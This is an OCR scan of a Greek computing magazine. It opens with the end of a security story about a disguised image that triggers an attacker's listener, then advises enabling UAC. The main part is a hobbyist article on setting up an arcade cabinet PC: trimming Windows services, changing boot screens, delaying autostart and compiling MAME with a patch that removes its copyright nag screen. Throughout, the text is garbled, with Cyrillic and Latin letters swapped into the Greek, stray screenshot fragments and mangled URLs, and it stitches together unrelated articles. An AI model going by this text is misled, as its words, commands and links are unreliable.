Πραγματικἁ, η εικὀνα ανοἰγει κι απ΄ ὁ,τι φαίνεται τίποτε, uq τίποτε ἆλλο 
δεν συμβαίνει. 


Μόνο που στη μεριὰ του επιτιθέµενου ο multi handler listener απαντά 
(βλ. εικὀνες 2 και 3). 


O επίλογος 


Αν το θύμα εἰχε ενεργοποιημένο Tov UAC ἡ ἑστω εἰχε επιλέξει την εμφά- 
νιση των καταλήξεων στα ονόματα αρχείων και ἦταν λἰγο µόνο υποψια- 
σμένο, τίποτε апо τα παραπάνω δεν θα εἰχε συµβεἰ στο παραμυθάκι µας 
:) 

Ελπίζω διαβἁζοντάς To να πἐρασε Ліүо ευχάριστα η ώρα σας. Πολύ περισ- 
σὀτερο, ελπἰζω κι εὐχομαι η φανταστικἠ αυτή ιστοριούλα να σας έπεισε 
για το γεγονὸς бт! η ασφάλεια δεν έχει να κάνει μόνο µε τα ὀποια npo- 
γράμματα προστασίας τρέχουμε. Μην το ξεχνάτε: Στην πρώτη γραμμὴ 
άμυνας βρισκόμαστε εμεὶς! Το τι συμβαίνει στους υπολογιστὲς --συχνά 
και σ΄ εμάς τους ἰδιους-- εξαρτἆται κυρίως апо τη συμπεριφορά µας. Ἐχε- 
τε, λοιπὸν, σωστή συμπεριφορά. 


Κάντε το πρώτο, μικρο βήμα προς αυτἠ την κατεύθυνση ενεργοποιώντας 
και πάλι To UAC. 
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Εντάξει, ото arcade cabinet που ξεκινήσαμε 

να φτιάχνουμε ano To τεύχος 001 δεν βάλαμε 
κερµατοδέκτη. Απουσιάζουν ὁμως κι ἄλλα στοιχεία, ενὠ 
` 


δεν θα ‘npene. Υπάρχουν Enions KI αρκετὲς EVOXANTIKEG 
παρουσίἰες... Φαίνεται πως έχουμε αρκετά μερεμέτια 
ακόµα, ὥστε то δικὀ µας arcade cabinet να γίνει το 
καλύτερο του σύμπαντος! (Αν και εἶναι ἠδη, εφὀσον το 
κατασκευάσαμε µε та χεράκια µας ;-) 


Με το εργαλείο 
msconfig µπορείτε 
να απενεργοποι- 
ἠσετε ὀποιες Kal 
όσες υπηρεσίες 
εἶναι άχρηστες 

για το σύστημά 
σας. Αρκεί µόνο 
να αφαιρέσετε το 
ΤΙΚ, στ΄ αριστε- 

ра του ονὀματός 
τους. Θα πρέπει 
ωστόσο να εἰσαστε 
προσεκτικοί. Ένα 
λάθος κλικ μπορεί 
να οδηγήσει o” Eva 
σύστημα που οὐτε 
καν Ροοίἀρει! 


Δόμηση τελικού σημείου хоо т... 
Ἠκοστων Windows 

Πρόγραμμα εγκατάστασης Activ... 
Υπηρεσία κρυπτογράφησης μον... 
Μηχανισμός βασικού φιλτραρίσμ... 
[ГЇ Υπηρεσία Background Intelligent ... 
Αναζήτηση υπολογιστών 

Υπηρεσία υποστήριξης Bluetooth 
Μετάδοση πιστοποιητικών 
Microsoft .NET Framework NGEN... 


[Q] Егтпги inu σπιστήπιστως СОМ 
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Το λειτουργικὸ σύστημα που εγκατέστησα στο PC Tou arcade cabinet 
ἠταν τα Windows 7 Ultimate (αυτά sixa εὐκαιρα, µη арат). Περιττό 
να πω ὁτι ката την εγκατάσταση δηµιούργησα ἐναν και µόνο λογαρια- 
сро χρήστη, για τον οποίο μάλιστα δεν ὀρισα κανένα password. Ἠθελα 
όταν ξεκινά το σύστημα να καταλήγει στην επιφάνεια εργασίας χωρίς να 
σταματά περιμένοντας κάποιο συνθηματικὀ. Ano εκεἰ θα αναλάμβανε ο 
μηχανισμὸς της αυτόματης εκκίνησης, ο οποίος θα ξεκινούσε To frontend 
για το MAME. Στη σκέψη µου, τουλάχιστον, λειτουργούσαν όλα θαυμά- 
ста! Αφού προσέθεσα και To frontend στην αυτόματη εκκίνηση, ¿kava 
την πρώτη δοκιμή: Στρογγυλοκάθισα µε τη διάθεση του ανθρώπου που 
πρὀκειται να παἰξει τα αγαπημένα του παιχνίδια και πάτησα το κουμπί 
που ενεργοποιεί το PC του cabinet. Μέχρι να εμφανιστεί το frontend εἶχα 
ξενερώσει, ενώ ακριβώς τότε ¿paya και µια ωραιότατη κατραπακιά! 


Μπορώ -σας παρακαλώ- να παἰξω; 


Το σύστημα καθυστερούσε προκλητικἁ να ξεκινήσει. Τις ελάχιστες φὀ- 
ρες που εἰχε τύχει στο παρελθὀν να παρακολουθήσω την ενεργοποίηση 
ενὸς arcade, το μηχάνημα ἠταν ἑτοιμο να δεχτεί τον οβολὀ µου, μέσα 
σε μερικά δευτερὀλεπτα. Το δικὀ µου ὁμως απαιτούσε σχεδὸν δύο Às- 
nta! Βλέπετε τα Windows 7 Ultimate ξεκινούν δεκάδες υπηρεσίες, ano 
τις οποίες ελάχιστες μόνο απαιτούνται για ἑνα σύστημα που ἐχει pova- 
δικὀ προορισμὸ να τρέχει το MAME. Και σαν να µην ἑφτανε αυτὸ, μετά 
ano To post του BIOS εμφανιζόταν To σηματάκι των Windows 7 μαζὶ p’ 
Eva θερμό καλωσόρισμα апо τη Microsoft, ενώ ακολουθούσε το χαρού- 
μενο logon screen (εκεἰνο µε τα πουλάκια και τα κλαράκια) που ουδεμία 
δουλειά εἰχε στο arcade cabinet! Και μετὰ ερχόταν η καταστροφή: To 
frontend ξεκινούσε αυτόματα, алла η EKTEAEON του προηγούταν εκείνης 


+ 


Ημερομηνία ап... 
Microsoft Corporation i κ 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 


Microsoft Cornnoration 


11/8/2011 10:5... 
11/8/2011 10:5... 


11/8/2011 10:5... 

11/8/2011 10:5... 

11/8/2011 10:5... 

11/8/2011 10:5... 
Διακόπ... 


Λιπικὠπ... 


Σημειώστε от ορισμένες ασφαλείς υπηρεσίες 
Microsoft δεν εἶναι δυνατό να απενεργοποιηβούν. 


[Г] Απόκρυψη ὅλων των υπηρεσιών της Microsoft 


—s Акиро | | Εφαρμογή | Βοήθεια 
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Χωρίς κερµατοδέκτη (μέρος 2/2) 


Αα 


Tou explorer. Ως αποτέλεσµα, παρὀλο που To frontend ἦταν ρυθμισμένο 
για να ξεκινά μεγιστοποιημένο (σε fullscreen), η taskbar των Windows 
εμφανιζόταν ano πάνω του - ἐχοντας фиска και το focus. Па να χρησι- 
μοποιήσω To frontend, έπρεπε προηγουμένως να πατήσω το συνδυασμό 
πλήκτρων [Alt+Tab] :S 


PaBe ξήλωνε 


Ξεκίνησα ano τα εὐκολα. Το прото праүна nou ¿kava ñTav να εκτελέσω 
το εργαλεἰο του συστήματος ονόματι msconfig και να ENIOKEMTW την KAP- 
τἐλα Startup. Ano εκεἰ αφαἱρεσα κάθε περιττό прбүранна που ξεκινούσε 
pai µε то λειτουργικὀ. Στη συνέχεια το παιχνίδι χόντρυνε. Επισκέφτηκα 
την καρτέλα Services κι ἄρχισα να ξηλώνω τις υπηρεσίες που µου ἠταν 
ἄχρηστες. Στην πράξη, αφαἰρεσα ὀλες σχεδὀν τις δικτυακὲς υπηρεσίες, 
καθώς και µερικἐς ακόµα που αφορούσαν στην υποστήριξη Bluetooth, 
στο φαξ, στην ανταλλαγἠ κλειδιὼν κρυπτογράφησης και πάει λέγοντας. 
Φυσικά, αυτἠ η απενεργοποἰηση ἐγινε προσεκτικἁ και µε αρκετὲς δοκι- 
HQOTIKEG επανεκκινήσεις, MOTE να µην καταστρέψω ανεπανόρθωτα то 
σύστημα. Τελικά τα κατάφερα: Το σύστημα ξεκινούσε σε λιγότερο апо 
το шоб χρόνο! Συνέχιζαν ωστόσο να εμφανίζονται τα διάφορα χαριτω- 
μένα της Microsoft. Έτσι, ξεκίνησα µια σχετικἠ αναζήτηση στο Internet. 
Σύντομα, εντὀπισα τα Windows 7 boot animation updater και Windows 7 
LogonUI background changer, που φιλοξενούνται στις διευθύνσεις 


www. coderforlife.com/projects/win7boot 


To Win 7 Boot 
Updater επιτρέ- 
πει την επέμβαση 
στα μηνύματα και 
στην εικόνα που 
εμφανίζονται ката 
την εκκίνηση των 
Windows. Όταν 
τελειώσετε µετις 
επεμβάσεις σας 


και πατήστε Apply και 

z : : κάντε ша επανεκ- 

http: //windows7center.com/news/download-our-windows-7-logonui- κίνηση για να δείτε 

background-changer τ΄ αποτελέσµατα... 
[οσα 


File Options Language Help 


Booting | Resuming 


Animation 


Í Static Image = J 


ό E:\stuff\arcade cabinet\cabinet artwork \arcadg 


Method: Simple Be 
Messages 
Count: None x 
Background: 


Message 1 | Message 2] 
© Microsoft Corporation 
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ООШ O 
Fullscreen 
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Με TO συγκεκρι- 
μένο πρόγραµµα 
θα μπορέσετε ν΄ 
αλλάξετε την EIKO- 
va που εµφανίζεται 
κατά To logon. 
Καλό θα ἦταν va 
επιλέξετε την ἴδια 
εικόνα και σαν 
wallpaper στην 
επιφάνεια εργασίας 
του συστήµατος. 
Με αυτὀν τον τρὀ- 
πο, η εκκίνηση θα 
μοιάζει να περνάει 
ano το αρχικό στά- 
бю του boot στην 
επιφάνεια εργασίας 


΄ 
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Nnnn 


www windows 7 Се пїег.согп 


(@) Enable Resolution: 


Disable 1680 x 


αντίστοιχα. То прото εργαλείο επιτρέπει την αλλαγή των μηνυμάτων που 
εμφανίζονται ката το boot ἡ και την πλήρη απομάκρυνσή τους. Επιτρέπει 
επίσης την αλλαγή του αυθεντικού animation (το σηματάκι µε Ta λαµπυ- 
ріс̧оута χρώματα) µε капою алло animation ἡ µε στατικἠ εικὀνα. Εγὠ 
επέλεξα να απομακρύνω τα μηνύματα και να αντικαταστήσω το λογὀ- 
τυπο των Windows µε µια δικἠ µου (στατικἠ) εικὀνα. Δεν ἠθελα πολλὲς 
φανφάρες. Το δεύτερο εργαλείο επιτρέπει την αλλαγή της εικὀνας που 
εμφανίζεται ката το logon του συστήµατος. Αφού ἐβαλα την εικὀνα της 
επιλογής µου, Φφρόντισα στη συνέχεια να Opiow την ἴδια ακριβώς εικὀνα 
και σαν wallpaper για το desktop του συστήματος! Με αυτὸ το κολπάκι, 
η διάκριση μεταξύ desktop και logon screen ἦταν δύσκολη και η ενερ- 
yonoinon του arcade cabinet ἐμοιαζε να περνάει ano το boot splash στο 
desktop. Το γεγονὸς αυτό προσέδιδε την εντύπωση OT! το σύστημα EKI- 
VOUOE ταχύτερα ;-) 


Κάλλιο focus και καρτέρι 


Μπορούσα πλέον να κάθομαι μπροστὰ στο arcade kal το σύστημα va 
ξεκινἁ σε ελάχιστο χρόνο. Μόνο που ἦταν ακόμα αδύνατο va παϊξω! H 
taskbar επέμενε να εμφανίζεται πάνω ano το frontend και να κλέβει το 


Χωρίς κερµατοδέκτη (μέρος 2/2) 


το ο ο ὃν ώρα 


Name 


Location 


ν' Pa | ата йс Wot 
Ñ IntelliPoint 
StartCCC 


Command 


| Parameter(s) 


Queued startup items [sorted by de 


| Name | Com 


hours minutes 


ШШ Allow skip 
ШШ Wait until the appl fully active before loading next 
Il] Pause until this appl has been closed 


focus. Αποφάσισα λοιπὀν va επἐµβω στη διαδικασἰα της αυτόματης EK- 
κίνησης. Н αλήθεια εἶναι От! αυτό εἰχε συμβεί NON, µε τη βοήθεια του 
msconfig. Αυτἠ τη фора όμως Ва Χρησιμοποιούσα Eva πρόσθετο εργα- 
λείο: το Start-Q (www.start-q.com). To εν λόγω εργαλείο μάς επιτρέπει va 
εισαγάγουµε µια αυθαίρετη καθυστέρηση, πριν and την αυτόματη EKTE- 
λεση κάθε προγράµµατος. Με αυτὸν τον τρὀπο μπορούμε να εξασφαλἰ- 
σουµε бт! τα διάφορα προγράμματα ξεκινούν διαδοχικά κι OX! ταυτὀχρο- 
να. Επιτυγχάνουµε ETO! την αποσυμφόρηση του συστήματος και, τελικά, 
την οµαλότερη εκκἰνησή του. Όπως αντιλαμβάνεστε, εργαλεία σαν το 
Start-Q χρησιμοποιούνται συνήθως σε παραφορτωμένα συστήματα, ката 
την εκκίνηση των οποίων εκτελούνται αυτόματα πολλά προγράµµατα. 
Στην περἰπτωσή µου, ὅμως, το σύστημα δεν ἐπασχε and συμφόρηση. 
Το δικὀὸ µου πρὀβλημα αφορούσε στη βιαστικἠ εκτέλεση του frontend, 
το οποίο ξεκινούσε πριν ακόµα ολοκληρωθεί η φόρτωση του explorer! 
Με τη βοήθεια του Start-Q, λοιπὀν, εισήγαγα pia καθυστέρηση των 6 
δευτερολέπτων *npiv* απὸ την εκκίνηση του frontend. Мпоро να nw бт! 
το πέτυχα µε την πρώτη :D Μετὰ την επανεκκίνηση του συστήματος то 
frontend εκτελέστηκε στο σωστὸ χρὀνο και *Eixe* το focus. Μπορούσα 
επιτέλους ν΄ αρχίσω το παιχνίδι, χρησιμοποιώντας αποκλειστικἁ τα χειρι- 
στἠρια Tou arcade cabinet! 


Νέα βάσανα 


Όταν ολοκληρώθηκε η τελευταἰα επανεκκίνηση, ένιωθα σχεδὸν περήφα- 
νος. Ta Windows εἶχαν εξαφανιστεἰ και μόνο To post Tou BIOS υποδήλωνε 
бт! εἰχα μπροστὰ µου Eva РС. Μικρὸ το како, σκέφτηκα, κι αποφάσισα va 
παἰξω λίγο. To ἀξιζα! Όταν ὁμως προσπάθησα να ξεκινήσω κάποιο παιχνἰ- 
δι, τα Windows ξεπετάχτηκαν апо το πουθενὰ κάνοντας και πάλι αισθητἠ 


Registry\Current User (panos) т 
C:\Users\panos\Desktop\frontend. exe = 


Cancel 


To frontend ξεκι- 
νούσε πριν απὀ τον 
Windows explorer 
KI όταν ξεκινούσε 
ο δεύτερος, EKAEBE 
To focus! Με τη βο- 
ήθεια Tou Start-Q, 
όµως, Elonyaya 
µια καθυστέρηση 
των ἐξι δευτερολέ- 
πτων *npiv* ano 
την εκκίνηση TOU 
frontend. Έτσι, 
ἦταν το τελευταίο 
πρὀγραµμµα που 
ξεκινούσε και συ- 
νεπώς διατηρούσε 
To focus! 


'Orav To frontend 
εκτελούσε απευ- 
θείας κάποιο ano 
τα batch files, 
εμφανιζόταν στην 
οθόνη éva Teppa- 
TIKO των Windows. 
Απαράδεκτο για 
ἑνα arcade cabinet 
που σέβεται τον 
εαυτὀ του! 
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ΧΧΧ AA SSS SS AS S DTS SS ΧΧΧ ΧΑ ΧΑ oS" 


E:Nsstuff"stmpsfscommand>mameui32l.exe 1942 


την napouoiq τους! Βλέπετε, OTav To frontend κάλεσε TO OXETIKO batch 
file -το οποίο µε Tn σειρἁ του θα ξεκινούσε το επιλεγμένο Nalxvidi-, 
εμφανίστηκε στην οθὀνη Eva παράθυρο µε TO command prompt του ou- 
στήματος. Μ΄’ έπιασε αναφυλαξία. Τι ‘тау πάλι auto; Πώς θα το ξεφορτω- 
νόμουν; Apxiod να ψάχνω απελπισμέἑνα µια λύση κι ευτυχώς για та νεύρα 
μου, τη βρήκα αρκετά γρήγορα. H εταιρία Northcode ἐχει δημιουργήσει 
και διανέμει δωρεάν Eva προγραμματάκι, το οποίο λειτουργεί ως EVOIGUE- 
σος κρίκος για την εκτέλεση batch files µέσα апо flash projectors!. Το εν 
λόγω πρὀγραμµα ονομάζεται proxy.exe (θα βρεἰτε link στο τέλος αυτού 
του post www.northcode.com/blog.php/2007/08/07/Conquering-FSCommand- 
EXEC-Part-1-Proxy) KI ἑνα ano τα NpooovTa του εἶναι η απὀκρυψη του na- 
ραθύρου µε To command prompt. Ἠταν ακριβώς αυτό nou χρειαζὀμουν! 
Όταν εκτελείται το συγκεκριµένο πρόγραµµα αναζητά το ομώνυμο batch 
file και το τρέχει. Το κλειδὶ στην προηγούμενη πρόταση βρίσκεται στη 
λέξη «ομώνυμο». Αν μετονομάσουµε το proxy.exe σε mitsos.exe και TO 
εκτελἐσουµμε, θα προσπαθήσει µε τη σειρὰ του να τρέξει το mitsos.bat. 
Γενικότερα, αν το μετονομάσουµε σε kati_allo και το τρἐξουµε, θα EKTE- 
λέσει το kati_allo.bat. Με τη βοήθεια Tou proxy, λοιπὸν, εἶχα βρει Evav 
τρόπο να кало ano το frontend τα διάφορα batch files *xwpic* να εμφα- 
νἰζεται κάθε фора To command prompt. Βέβαια, για va υλοποιήσω αυτή 
τη λύση έπρεπε να κάνω δύο πράγματα: Να δημιουργήσω Eva αντίγραφο 
του proxy.exe για κάθε batch file δἰνοντάς του κάθε φορά то ἰδιο ακριβώς 
ὀνομα, καθώς και να τροποποιήσω κατάλληλα τον κὠδικα του frontend, 
ὥστε να µην καλεἰ τα αρχεία bat αλλά τα ομώνυμα αντίγραφα Tou proxy. 
Па τη δεύτερη εργασία -την αγγαρεἰα-, ξεκίνησα τον υπολογιστή µου 
σε Linux. Πήρα τη Ліста των παιχνιδιὼν που εἶχα χρησιμοποιήσει για τη 
δηµιουργία των batch files κι ἐφτιαξα το ακόλουθο BASH script: 


#!/bin/bash 
for i in $(cat gamelist); do 
cp proxy.exe $i.exe 
done 
exit 
Όταν To εκτέλεσα, για κἆθε γραμµἠ της λίστας (δηλαδή για kåðe nal- 


Xvid!) δημιουργήθηκε Eva ομώνυμο αντίγραφο Tou proxy. Με την ἴδια 
μέθοδο και την ἴδια λίστα εἶχα δημιουργήσει και Ta batch files. Επομέ- 


1. «Flash projector» ονομάζεται µια εφαρµογἠἡ flash nou µεταγλωττίστηκε για να εκτελείται αυτόνομα στο 
περιβάλλον των Windows, χωρίς τη βοήθεια κἀποιου flash player. 
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АА 


Usage of emulators in conjunction with ROMs you 
don't own is forbidden by copyright law. 


IF YOU ARE NOT LEGALLY ENTITLED TO PLAY 
"Arkanoid - Revenge of DOH (World)" ON THIS 


EMULATOR, PRESS ESC. 


[ia νομικίστικους 
λόγους, κάθε φορά 
που ξεκινάμε Eva 
παιχνίδι µε το 
ΜΑΜΕ εμφανίζεται 
Eva πλαίσιο καὶ 
ζητά να επιβεβαιώ- 
σουµε ὁτι єірастє 
νόμιμοι κάτοχοι 
των σχετικών ROM. 
Πειράζει πολύ, 
λέτε, αν ξεριζώ- 
σουµε AUTÓ TO 
«feature»; 


Otherwise, type OK or move the joystick left then 


right to continue 


νως, διέθετα πλέον Eva avTiypa@o Tou proxy για κάθε batch file, µε To 
ἰδιο ακριβώς ὀνομα! Αμέσως μετά επέστρεψα ота Windows κι ¿Kava τις 
απαραίτητες αλλαγές στον κὠδικα του frontend. Μέσα σε λιγότερο ano 
ша ора εἶχα λύσει Eva ακόµα απροσδόκητο πρὀβλημα. Εἶχα αρχίσει να 


νιώθω δυνατὸς :D 


Μεγάλη μπουκιά фак... 


Н λύση HE то proxy.exe λειτουργούσε ἄριστα. Επιτέλους, σκέφτηκα, ἑφτα- 
σε η ора που θα naigw...! To λογισμικὀ όμως εἶχε αντίθετη ἀποψη :5. 


| Sax) 


Ф > «є system (Œ) > MinGW > source > Be 


Share with w 


Organize w 


a C Favorites 
Ш [] Downloads 
h [] Documents 
k Π Applications 
ad [] Movies 
J п Music 
Ji [] Photos 
k [] Pictures 
"Ж ЕТ 
ME Desktop 


b J Libraries 
| P ДЕШ Computer 


b a Network 


Include in library w 


= 
Name 


h artwork 
à docs 
à hash 
j һы 

Ш src 


|_| makefile 


L] whatsnew.tet 


Burn New folder 


Date modified 


11/10/2011 3:40 μμ 
11/10/2011 3:40 μμ 
11/10/2011 3:40 μμ 
11/10/2011 3:40 μμ 
11/10/2011 3:40 μμ 
25/6/2011 10:03 πμ 


28/6/2011 7:20 μμ 


Search source 


File folder 
File folder 
File folder 
File folder 
File folder 
File 


Text Document 


H εγκατάσταση του MAME Compiler δημιούρ- 
γησε τον φάκελο C:\MinGW και κάτω απ’ αυτόν 
µία ολόκληρη ιεραρχία καταλόγων. Αν θέλετε 
να τη σεβαστείτε, θα πρέπει να τοποθετήσετε 
τον πηγαίο κώδικα του MAME στον κατάλογο 
source. Προηγουμένως, ωστόσο, καλό θα ἦταν 
να διαγράψετε οτιδήποτε ἆλλο διέθετε στο 


εσωτερικὀ του... 


У НА@КЕК 


NNS 


Προφανώς, Ta 
επίσημα και Ta 
ανεπίσημα patch 


τοποθετούνται 

στον κατάλογο Organize = Include in library ¥ Share with + Burn 

patches. Огу λόγω аў Favorites Name ? Date modified Type 

κατάλογος ὀμως | й 

περιλαμβάνει hon Б Π Downloads [ 1 0143u1.diff 11/7/2011 10:45 pp DIFF File 1.275 KB 
ένα αντίγραφο J [] Documents [21 0143u2.diff 27/7/2011 6:53 πμ DIFF File 3.199 KB 
Tou patch, nou Ф П Applications L_] 0143u3.diff 011 7:13 пр DIFF File 2314 KB 
ενεργοποιεί την Ji П Movies [ | 0143u4.diff 25/8/2011 9:21 μμ DIFF File 3.944 KB 
αποθήκευση των J I Music [| 0143u5.diff 6/9/2011 4:50 μμ DIFF File 1.955 KB 
high scores kI D Π Photos 0143u6.diff 21/9/2011 12:24 mp DIFF File 4.791 KB 
απενεργοποιεί TO J [Pictures 21/8/2011 10:34 pp DIFF File 35 KB 
nag screen. Καλό "ЕТ O hi „di 11/10/201111:55mp DIFF File 35 KB 
θα ἦταν va To ΒΕ Desktop 

διαγρόψετε και να 


χρησιμοποιήσετε p 09 Libraries 
αυτό που κατε- 
βάσατε εσείς, TO 
οποίο προορίζεται 
ακριβώς για την 
ἐκδοση του ΜΑΜΕ 
που πρὀκειται va 
μεταγλωττίσετε. 


| > iil Computer 


> Gig Network 


Πα va €vepyonoin- 
θεί η αποθήκευση 

των high scores θα 
πρέπει να δηµιουρ- 


γησετε εναν κατα- Organize + Burn New folder 

λογο µε τ΄ ὀνομα 

«hi», μέσα o” GUTOV | Se Favorites Date modified 

που βρίσκεται και = = 

ΤῸ mame. exe, J [] Downloads 4 11/10/2011 7:21 pp File folder 
Επιπρόσθετα, στην | Ὁ П Documents |_| hiscore.dat 23/1/2011 5:44 μμ. DAT File 
ίδια θέση θα πρέπει ШЫ Applications Ceme Tr 

va ρίξετε Και TO J [l Movies 


αρχείο hiscore.dat Ш п 


ñ Music 
που κατεβάσατε... 


ЦЫ [] Photos 
k Π Pictures 
| ЕТ 
ΕΕ Desktop 


Libraries 
{Б Computer 


αμ Network 


| 


Г ] 2 items selected Date modified: 23/1/2011 5:44 pp - 11/10/2011 7:21 μμ 
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C\Windows\syst 


C:\Users\panos\Desktop\my mame 
C:\Users\panos\Desktop\my mahe>mame.exe -cc 


C:\Users\panos\Desktop\my mam@>ren mame.exe мамец1 32 .exe 


C:\Users\panos\Desktop\my mame> 


Υπήρχαν ακόµα ορισμένες μικρὲς алла αρκετά EVOXANTIKEG ατέλειες. Mż- 
хр! εκείνη τη στιγμή οι ἑλεγχοὶ HOU αφορούσαν στο αν και στο пос ξεκι- 
νούν τα παιχνἰδια. Οὐτε pia φορὰ δεν εἶχα δώσει σημασία στο τι δείχνουν 
και στο τι λένε όταν ξεκινάνε. Δυστυχώς, αυτὸ που ἐλεγαν δεν µου ἁρε- 
σε καθὀλου. Μου ζητούσαν να πληκτρολογήσω το «ΟΚ» ἡ να κουνήσω 
το joystick πἐρα-δώθε, σαν επιβεβαίωση οτι ἡμουν νόμιμος κάτοχος του 
αντίστοιχου ROM. Με ἄλλα λόγια, то MAME εμφάνιζε το λεγόμενο nag 
screen (αν και δεν εἶχα μάθει ακόµα OT! λἐγεται ἐτσι), που EXOUV φυτέψει 
οι προγραμματιστὲς του για να ξεπεράσουν διάφορα νομικά κολλήμα- 
τα. Αυτὀ δεν θα το αφαιρούσα εὐκολα. Τουλάχιστον αυτὀ υποψιαζόμουν 
και yl’ αυτό αποφάσισα να αγνοήσω για την Opa την παρουσία του nag 
screen και να παἰξω... 


Ката τα γνωστὰ, ἐπαιξα πιο поло an’ ògo υπολόγιζα ;-) Ἐπαιξα τόσο, 
που όταν σηκώθηκα αποφάσισα να φύγω апо το σπίτι και να καταπιαστὠ 
ξανὰ την επὀµμενη μέρα. Έτσι κι ἐγινε, μόνο που την επόμενη μέρα δεν 
καταπιάστηκα µε το πρόβλημα του nag screen, αλλά µε τα παιχνίδια. 
Τότε όμως, διαπίστωσα το μοιραίο: ΠΟΥ ΠΗΓΕ ΤΟ HIGH SCORE ΜΟΥ ΣΤΟ 
MS-PACMAN; 


Καθολική λύση 


Η μανιώδης αναζήτηση που ακολούθησε ἐφερε αποτελέσµατα. Καταρχάς, 
ἐμαθα για την ονομασία Tou nag screen και επιβεβαίωσα бт! то MAME δεν 
αποθηκεύει ποτὲ τα high scores! Έμαθα ὁμως και τη λύση: Θα έπρεπε 
να µεταγλωττίσω τον ппүаіо κὠδικα του MAME μόνος µου, αφού прота 
του εφαρμµόσω Eva ειδικὀ patch. Με άλλα λόγια, έπρεπε прота να μάθω 
το пос γίνεται αυτή η μεταγλώττιση στα Windows και να βρω та σχετικἁ 
patches. Па καλἠ µου τύχη, βρήκα τα πάντα σε αυτὀ το thread: 


http://bit.ly/dhee2hiscorediff 


Τα πράγματα εἰχαν αρχίσει va καλυτερεύουν. Av δεν εἰχα χάσει και το 
high score, θα ένιωθα περἰφηµα... 


Προετοιμασία και μεταγλώττιση 


Αφού µελέτησα τη διαδικασία της HETAYAMTTIONS апо πολλὲς πηγὲς, Ka- 
τἐληξα να εμπιστευτώὠ Eva εργαλεἰο που καθιστά την όλη εργασία υπό- 
θεση μερικών κλικ! Έτσι, ἄρχισα σιγἀ-σιγά να συγκεντρὠνω το απαιτού- 
μενο υλικό. Ξεκίνησα апо то εργαλεἰο που διευκολύνει τη μεταγλώττιση 
(MAME Compiler), το onoio κατέβασα апо εδώ: 


www.headsoft.com.au/index. php?category=mame&page=mc64 


Πα την αυτόματη 
δηµιουργία του 
αρχείου ρυθμίσεων 
του MAME (mame. 
ini), EKTEAEOTE TO 
апо τη үрацип 
εντολών HE TNV 
παράμετρο -cc. 
Επίσης, µην ξεχά- 
σετε να δώσετε 
στο εκτελέσιμο TO 
ὀνομα που γνωρίζει 
και χρησιμοποιεί το 
δικὀ σας frontend! 
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File Edit Format View Help 
# CORE INPUT OPTIONS 


# 


coin_lockout 


ctrir 


eyboard 


түт 


steadykey 


H υποστήρι- 

ξη πολλαπλών 
πληκτρολογίων 
ενεργοποιείται απὀ 
την παράμετρο 
multikeyboard, 
που βρίσκεται στο 
αρχείο mame. ini. 
Όσο για τις αναλο- 
γίες προβολής που 
θα χρησιμοποιεί 
κάθε παιχνίδι, 
αυτὲς καθορίζονται 
ano την пара- 
μετρο aspecto. 
Τελικά To GUI Tou 
MAME εἰναι ἀχρη- 
στο :D 
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Στη συνέχεια επισκἐφτηκα την τοποθεσία 
http://mamedev.org/release.html 


an’ ὀπου κατέβασα το πακέτο HE τον ппүаіо κὠδικα της πιο πρὀσφατης 
ἐκδοσης του MAME. Ακολούθως, κατέβασα κι όλα τα επἰσηµα patches, 
για την ἐκδοση του πηγαίου κὠδικα που διέθετα (0.143). Τα διαθέσιµα 
patches ἦταν 7 kal τα κατέβασα όλα ano To 


http://mamedev.org/updates 


Па το τέλος ἄφησα To πιο σημαντικὀ patch: Εκεἰνο nou anevepyonolei 
το nag screen κι ενεργοποιεί την αποθήκευση των high scores! Το link 
για να το κατεβάσω βρισκόταν (και θα συνεχίσει να βρίσκεται) σε αυτὀ 
το thread: 


http://bit.ly/dh@e2hiscorediff 


Σ’ εκεἰνο το στάδιο αμφιταλαντεύτηκα λἰγο. Μήπως θα έπρεπε va κατεβά- 
со και τον πηγαἰο κὠδικα για το MAMEUI; Ὅμως το παραθυρικὀ περιβἀλ- 
λον του MAME δεν θα εμφανιζόταν ποτὲ στο arcade cabinet. Έτσι ano- 
φάσισα να ретаүлоттісо ша «καθαρἠ» εκδοχἠ του MAME, χωρίς GUI... 


Н μεταγλώττιση αποδείχθηκε περίπατος! Εγκαθιστώντας το MAME 
Compiler παρατήρησα бт! δημιουργήθηκε Eva δέντρο καταλόγων, то 
οποίο катӣ паса πιθανότητα θα λειτουργούσε ως workspace για тп µετα- 
γλὠττιση. Μέσα σ΄ αυτἠ τη δομή των καταλόγων (ξεκινούσε апо τη θέση 
C:\MinGW) βρήκα ἐναν µε το ὀνομα patches και Evav ακόµα HE TO ὀνομα 
source. Προφανώς, στον прото αποσυµμπἱεσα όλα τα patches - επίσημα 
κι ανεπίσημα- ενώ στον δεύτερο αποσυµπἰεσα το πακέτο µε τον πηγαίο 
κὠδικα του MAME. Αμέσως µετά ξεκίνησα το MAME Compiler. Apxikd του 
ἐδειξα το σωστὸ φάκελο µε τον nnydio κὠδικα και στη συνέχεια άρχισα 
να εφαρµόζω τα patches. Ξεκίνησα ano τα επίσημα (τα οποία εγκατέστη- 
σα µε τη σειρἁ ἑκδοσὴς τους) και για το τέλος ἄφησα το ανεπίσημο. То 
δικὀ µου MAME απείχε µόνο μερικὰ κλικ! Апо τη δεξιά περιοχἠ του napa- 
θύρου του MAME Compiler καθὀρισα τα χαρακτηριστικἁ του συστήματος 
στο οποίο θα ἐτρεχε то MAME (dual core, Pentium-4) και φρόντισα να 
απενεργοποιήσω την επιλογἠ Mame UI. Στα καπάκια πάτησα το κουμπί 
GO και πήγα να φτιάξω καφέ... 


Χωρίς κερµατοδέκτη (μέρος 2/2) 


0 ССС ССС 


File Edit Format View Help 
# PER-WINDOW VIDEO OPTIONS 
# 

screen 

aspect 


[resolution 
view 


„=й 


MAME vs ROMs 


To MAME εξελίσσεται diapkWc, ώστε η εξομοἰωσή που πραγματοποιεί να 
εἶναι οµαλότερη και να επεκτείνεται σε περισσότερες μηχανές. Αυτή η 
διαδικασία μάς συμφέρει όλους! Πολλὲς φορὲς ὁμως δημιουργεἰ και npo- 
βλήματα. Το πιο ενοχλητικὀ αφορά στις ασυμβατότητες που παρουσιἀζο- 
ута! µε та ROM. П’ auto το λόγο, πολλοἰ χρήστες αποφεύγουν ν΄ αλλά- 
ζουν εκδόσεις του MAME. Ακριβώς για τον ἰδιο λόγο το απἐφευγα κι εγώ! 
